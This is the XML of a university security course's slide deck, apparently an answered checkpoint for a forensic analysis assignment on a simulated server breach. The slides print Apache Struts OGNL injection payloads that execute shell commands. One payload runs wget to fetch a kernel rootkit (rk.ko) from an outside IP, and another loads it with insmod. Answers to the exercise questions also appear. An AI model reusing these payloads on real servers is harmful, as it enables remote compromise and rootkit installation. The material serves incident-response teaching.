                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>').(#dm=@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>).(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>container.getInstance</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedPackageNames</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedClasses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>context.setMemberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#dm)))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>='insmodrk.ko.1').(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.System@getProperty</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>('os.name').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>toLowerCase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().contains('win'))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?{'cmd.exe','/c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>}:{'/bin/bash','c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>})).(#p=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>newjava.lang.ProcessBuilder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.redirectErrorStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(true)).(#process=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@org.apache.struts2.ServletActionContext@getResponse().</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>getOutputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())).(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>org.apache.commons.io.IOUtils@copy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>process.getInputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(),#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros.flush</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())}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8478880"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39312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%{(#_='multipart/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>formdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>').(#dm=@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>).(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>container.getInstance</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedPackageNames</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedClasses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>context.setMemberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#dm)))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=</a:t>
                      </a:r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'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>wget</a:t>
                      </a:r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0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http://162.212.156.148/rk.ko</a:t>
                      </a:r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 &gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>rk.ko</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>’) .(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.System@getProperty</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>('os.name').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>toLowerCase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().contains('win'))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?{'cmd.exe','/c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>}:{'/bin/bash','-c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>})).(#p=new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.ProcessBuilder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.redirectErrorStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(true)).(#process=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@org.aapache.struts2.ServletActionContext@getResponse().</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>getOutputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())).(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>org.apache.commons.io.IOUtils@copy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>process.getInputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(),#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros.flush</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())}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3313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0247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7AB6F-89A0-4FA8-B30D-66F589EB6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200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – HTTP Traffic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86B5-C0CA-44C7-A49D-844D77E2F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88"/>
            <a:ext cx="10515600" cy="566737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2.b Fill in the blanks in the table below</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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B1028DC-E350-496A-BE6F-EA851853BC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079467"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1803400" y="1948848"/>
          <a:ext cx="8127999" cy="4544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0850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3480395909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3511502925"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4273549">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2032268951"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="772209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Command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Present in the attack?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Interpretation of the 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920767"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>whoami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Displays the name of the current user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829335"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>wget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Free utility for non-interactive web downloads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9588715"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>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Displays files within a directory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7009087"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>cat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Print file or input on the console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8607177"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>cd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Change working directory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915285"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>insmod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Insert a module into the Linux Kernel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8687055"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>ssh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Remote connect to a server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8434672"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="447391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>lsmod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Displays currently loaded kernel modules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6594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1391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7AB6F-89A0-4FA8-B30D-66F589EB6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3125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – Host Logs 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575F8B-7BD6-4ABB-96F6-03B242230721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1272665"/>
            <a:ext cx="8905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1.a Provide a list of kernel modules added or removed from the system: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46F7F0-EF21-4F9B-9ED2-B02AA32C8AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="5019362"/>
            <a:ext cx="89058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1.b What is the attacker-controlled kernel module?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rk.ko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CFCD11-15B0-4BBA-B656-095B77FD9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310" y="1676412"/>
            <a:ext cx="4945380" cy="309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57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7AB6F-89A0-4FA8-B30D-66F589EB6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3125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – Host Logs 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575F8B-7BD6-4ABB-96F6-03B242230721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647699" y="1531551"/>
            <a:ext cx="8905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1.c How did you verify that the module was loaded onto the server?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324F35-29A3-4606-85E5-6BDE71585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356" y="1900883"/>
            <a:ext cx="7528560" cy="166116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C47212F-4F7D-4631-A257-0FEA298131C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4186106" y="2365695"/>
            <a:ext cx="511729" cy="3858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67A4C1-4A1B-41EC-814A-9AB128D1E444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773534" y="3857578"/>
            <a:ext cx="110633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Helvetica Neue"/>
              </a:rPr>
              <a:t>the module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>rk.ko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> was "added" (as seen in the action column), we can say that the attacker kernel is loaded.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118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7AB6F-89A0-4FA8-B30D-66F589EB6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3125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – Host Logs 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575F8B-7BD6-4ABB-96F6-03B242230721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647699" y="1531551"/>
            <a:ext cx="89058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2. What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that contains the internal hostnames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known_hosts.swp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385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7AB6F-89A0-4FA8-B30D-66F589EB6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3125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – Host Logs 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575F8B-7BD6-4ABB-96F6-03B242230721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695325" y="1522026"/>
            <a:ext cx="101060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3. Do you observe any evidence that the attacker extracted the internal host names via HTTP in the logs? (If yes, report the log line. If not, briefly explain why not. )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We don’t see any evidence that the attacker extracted internal host names via HTTP, probably because the attacker was not naïve.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3023106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1264</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>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Helvetica Neue</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Mini-Project 3 Checkpoint 1 ECE/CS 498DS Spring 2020</vt:lpstr>
      <vt:lpstr>Task 0</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – DNS Traffic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Mini-Project 1 ECE/CS 498DS Spring 2020</dc:title>
  <dc:creator>James Cyriac</dc:creator>
  <cp:lastModifiedBy>Kuntumalla, Gowtham</cp:lastModifiedBy>
  <cp:revision>85</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-30T21:31:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-14T04:02:49Z</dcterms:modified>
</cp:coreProperties>
</file>